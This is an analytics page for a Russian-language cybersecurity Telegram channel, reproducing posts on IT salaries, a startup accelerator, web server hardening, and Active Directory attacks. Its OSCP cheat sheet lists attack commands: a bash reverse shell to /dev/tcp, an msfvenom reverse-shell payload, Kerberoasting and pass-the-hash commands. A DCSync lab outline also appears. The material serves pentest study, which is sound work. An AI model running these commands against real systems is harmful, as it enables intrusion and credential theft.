Available now! Telegram Research 2025 — the year's key insights 
white2hack 📚
Open in Telegram
Кибербез. Книги, гайды, how to, ликбез. Аналитика, тренды, карьера, эвенты. Этичный хакинг и защита своих данных 🔊 Связь t.me/w2hack?direct 💬 Чат https://t.me/+VdkEIWudTi5m3dsA 💡 Консультация https://consult.ivanpiskunov.com 🏛 Обмен -- private --
Show more📈 Analytical overview of Telegram channel white2hack 📚
Channel white2hack 📚 (@w2hack) is an active participant. Currently, the community unites 12 498 subscribers, ranking 10 163 in the Technologies & Applications category and 52 913 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 12 498 subscribers.
According to the latest data from 13 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 37 over the last 30 days and by -1 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 11.09%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 386 views. Within the first day, a publication typically gains 0 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 9.
- Thematic interests: Content is focused on key topics such as attack, linux, cybersecurity, white2hack, threat.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Кибербез. Книги, гайды, how to, ликбез. Аналитика, тренды, карьера, эвенты. Этичный хакинг и защита своих данных
🔊 Связь t.me/w2hack?direct
💬 Чат https://t.me/+VdkEIWudTi5m3dsA
💡 Консультация https://consult.ivanpiskunov.com
🏛 Обмен -- private -...”
Thanks to the high frequency of updates (latest data received on 14 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
12 498
Subscribers
-124 hours
+47 days
+3730 days
Posts Archive
12 498
🔥 Зарплаты в Microsoft: сколько получают программисты в 2025 году 🔥
В сеть попали внутренние инструкции Microsoft по оплате труда технических специалистов, которые дают представление о реальных зарплатах и бонусах в одной из крупнейших ИТ-компаний.
В Microsoft действует система уровней (грейдов), отражающая должность и опыт сотрудника. Уровни 57–59 соответствуют джуниорам, уровень 63 считается отправной точкой для сеньоров, а с 65-го начинается «принципальный» (principal) уровень. Еще выше — партнеры (68) и признанные эксперты (distinguished, 70).
Например, инженер на самом высоком уровне 70 может получать до $408 000 в год (в зависимости от локации), а также получить разовую акционную премию при найме до $1,9 миллиона и ежегодные акции на сумму до $1,476 миллиона. Для новичков (уровень 57) «главный» диапазон зарплаты составляет от $83 000 до $108 000, а в городах с высоким уровнем жизни — от $95 800 до $124 600. При найме им также полагаются бонус и пакет акций.
❗️ Источник
#analytics #world
12 498
+1
💻 Дорогу талантам, новым возможностям, реальным перспективам, свежим технологиям и открытиям - МЫ ПРИГЛАШАЕМ В ИТ-АКСЕЛЕРАТОР KrokIT
➡️Кто мы такие? ➡️
KrokIT — стартап-акселератор с корнями из Беларуси, созданный бизнес-инкубатором «С нами будущее». Цель — помочь стартапам быстро добиться успеха, снизить риски и повысить привлекательность для инвесторов.
💻 Если ты в РФ, Европе и США, у тебя есть идея или MVP, ты готов делать высокотехнологичный бизнес - мы тебя ждем!
✅ С нами мы тебе гарантируем:
🔼 первая прибыль (для стартапов, пришедших на стадии идеи);
🔼 увеличение прибыли (для уже работающих стартапов);
🔼 помощь в масштабировании стартапа на зарубежные рынки (США);
🔼 формирование сильной и эффективной команды (6-месячное обучение, менторинг, нетворкинг);
🔼 продвижение продукта или услуги (СМИ, интернет пиар, Demo Day, выставки);
🔼 экспертная поддержка на протяжении всего обучения и после его окончания.
✅ Подача заявки:
➡️Подать заявку на участие можно на сайте акселератора. Программа подбирается в зависимости от стадии стартапа — идея, MVP, продажи, масштабирование.
➡️ Если стартап не получит первую прибыль или не увеличит прибыль в 2 раза, акселератор возвращает оплату: деньги или долю в проекте (согласно заключенного контракта).
📢📢 За первично консультацией по подготовке заявки (call for paper) и подробностями сотрудничества - обращайтесь в директ канала W2hack
🔝 Главная страница (FB + YT + LnkdIn)
💻 English page
#info #startup #world
12 498
🔄 Результаты и отчет о третьей ежегодной церемонии награждения Pentest award 2025 🔄
Pentest award уже третий год отмечает талантливых специалистов, которые делают огромную работу по поиску уязвимостей, оставаясь за кадром.
Важен сам подход и идея, необычные ресерчи и методики. Приз за победу — фирменная именная статуэтка и макбук. За второе место — айфон, а за третье — смарт-часы.
➡️ Читать на Хабре + ][akep
#event
12 498
+1
OSCP Cheat Sheet: Your Ultimate Penetration Testing Guide for Windows and Linux
Preparing for the OSCP exam or diving into penetration testing? Here’s a quick rundown of essential tools, commands, and techniques to help you succeed!
🔍 Recon & Enumeration
Nmap: nmap -sV -p- <IP> (Full scan)
SMB: crackmapexec smb <IP> -u user -p pass --shares
HTTP: gobuster dir -u http://<IP> -w wordlist.txt
⚡️ Exploitation
Reverse Shells:
Bash: bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
MSFVenom: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
Privilege Escalation:
Windows: Check winpeas.exe or powerup.ps1
Linux: sudo -l or find / -perm -u=s -type f 2>/dev/null
🔑 Password Cracking
John: john --wordlist=rockyou.txt hash
Hashcat: hashcat -m 1000 hash.txt wordlist.txt
🛠 Active Directory
Kerberoasting: impacket-GetUserSPNs -dc-ip <DC-IP> domain/user:pass -request
Pass-the-Hash: psexec.py -hashes LM:NTLM user@target
📌 Pro Tips:
Always check /etc/passwd, registry keys, and scheduled tasks for privesc paths.
Use tools like BloodHound for AD mapping and Mimikatz for credential dumping.
#pentest
12 498
+1
Credential Dumping LAPS
In this ar�cle, we will be discussing the concept of Creden�al Dumping and LAPS (Local Administrator
Password Solu�on). We will delve into the world of password management and explore how LAPS
can help mi�gate the risks associated with using shared local accounts and passwords across a
domain. With the increasing threat of cyber atacks, it's essen�al to understand the importance of
secure password management and how LAPS can help streamline this process.
Introduction to LAPS
The Local Administrator Password Solu�on (LAPS) is a tool designed to manage local account
passwords for computers joined to a domain. It securely stores these passwords in Ac�ve Directory
(AD) and protects them using Access Control Lists (ACLs). Consequently, only authorized users can
access or reset them.
Key Benefits of LAPS
In setups where users must log into computers without domain creden�als, managing passwords can
become challenging and heighten the risk of Pass-the-Hash (PtH) atacks. Therefore, LAPS addresses
the problem of using a shared local account with the same password across all computers in a
domain. It assigns a unique, randomly generated password to the local administrator account on
each machine. As a result, domain administrators can control which users, such as helpdesk staff,
can view these passwords.
#windows
12 498
+1
Credential Dumping: DCSync Attack
Active Directory Credential Dumping DCSync Attack is a specialized technique used by attackers to extract credentials from a domain controller (DC) by simulating the behavior of a domain controller itself.
🛠 Setting up a lab environment to simulate the attack
📚 Understanding the DRS protocol and how the attack works
🔍 Why such misconfigurations occur in real-world scenarios
💣 Exploiting the misconfiguration
🗺 Mapping the attack to MITRE ATT&CK
👁 Detecting the attack
🛡 Mitigation strategies
👁 Lab Setup
Requirements:
• A virtualized environment (e.g., VMware, VirtualBox, or Hyper-V).
• Windows Server configured as a Domain Controller.
• A Windows client machine.
• Tools: Impacket, Mimikatz, Netexec, and Metasploit.
Steps:
Domain Controller Configuraon:
• Install and configure Windows Server as a DC where domain name is ignite.local and IP is
defined as stac 192.168.1.48.
• Set up Acve Directory (AD) with a few users and groups.
#windows
12 498
Форсируем опции безопасности для web серверов на базе Apache и nginx
CORS, CSP, HTTPS и HSTS - это важные компоненты безопасности веб-сайтов. Они работают вместе для защиты данных и предотвращения различных видов атак.
🚨CORS (Cross-Origin Resource Sharing):
Позволяет контролировать, какие ресурсы на сервере могут быть доступны из разных доменов.
Используется для безопасного обмена данными между разными доменами.
По умолчанию браузеры блокируют междоменные запросы, но CORS позволяет серверам разрешать определенные запросы.
🚨CSP (Content Security Policy):
Помогает предотвратить атаки, такие как межсайтовый скриптинг (XSS).
Определяет, какие ресурсы (скрипты, стили, изображения и т. д.) браузеру разрешено загружать.
Настраивается через заголовок HTTP Content-Security-Policy.
🚨HTTPS (Hypertext Transfer Protocol Secure):
Обеспечивает безопасное соединение между браузером и сервером.
Использует шифрование для защиты передаваемых данных.
Необходим для защиты конфиденциальной информации, такой как пароли и данные кредитных карт.
🚨HSTS (HTTP Strict Transport Security):
Указывает браузеру всегда использовать HTTPS при доступе к сайту.
Предотвращает атаки, такие как downgrade (понижение) соединения до HTTP.
Настраивается через заголовок HTTP Strict-Transport-Security.
💡Дополнительно:
Хабр + Хабр2 + OWASP Cheat Sheet
🔽 Пример настройки опций ИБ для указанных веб северов смотри в файле ниже ⬇️⬇️⬇️
#web #hardering
12 498
🌟 Друзья, кто хочет поддержать бустами @w2hack - голосуйте по ссылке ниже! 📩
Нам не хватает всего
20 голосов (4 человека, кто может забустить) для возможности публикации сторис!
Розыгрыш Telegram Premium опять может привести к наплыву ботов и фейковых аккаунтов. Ваш вклад будет очень ценен!
🥰 Boost for w2hack 🌟
#info12 498
Сохраняя энергию стартапа. Как техногиганты ежедневно изобретают будущее и остаются на вершине, Алекс Кантровиц, 2022
12 498
+1
Сохраняя энергию стартапа. Как техногиганты ежедневно изобретают будущее и остаются на вершине, Алекс Кантровиц, 2022
Большинство компаний, определившись со своими преимуществами, зацикливаются на их совершенствовании, но забывают при этом, что их взгляд обращен в прошлое, а не в будущее. Amazon и другие технологические гиганты (такие как Facebook, Google и Microsoft) всегда работают так, будто каждый день – первый: эти лидеры рынка тратят свое время на переосмысление своих продуктов, а не на то, чтобы бесконечно их улучшать.
Благодаря 130 интервью, проведенным с сотрудниками ведущих IT-компаний, автор этой книги раскрывает секрет успеха технологических гигантов в деловом мире, где нет никаких гарантий, только риск и конкуренция.
#book #startup #
12 498
Английский важен, однако уровень, планка что бы тебя понимали не столь высоки. Важнее проникнуться культурой. В каждом городе свой вайб, например, ЛА отличается от Сан Франциско. Кремневая долина уникальное место, не похожее на другие города Америки
#world
12 498
👍 Друзья, за крайние пару дней (с 4/08 по 6/08) на наш канал был организован наплыв ботов и фейковых аккаунтов. Приняты меры по блокировке ботов - алгоритм очистки и бана работает автоматически и может цеплять живых пользователей, они временно попадают в blacklist. В течении нескольких дней (ориентировочно до 10/08) мы восстановим по возможности все ошибочно заблокированные аккаунты. Вы сможете переподписаться на канал без ограничений 👌
🆗 Канал работает в прежнем режиме 👍
Для новичков напоминаем, что доступ в чат (w2hack discussion) только по пригласительной ссылке (ищи в закрепе), после вступления в чат необходимо в течении 👍 30 секунд ввести ответ на капчу👍 (решить простой математический пример) иначе вас будет постоянно выкидывать.
Для тех у кого все таки возникли проблемы со входом пишите в 👋бот обратной связи, обязательно указывайте свой ник, сделаем все что сможем для восстановления!
#info
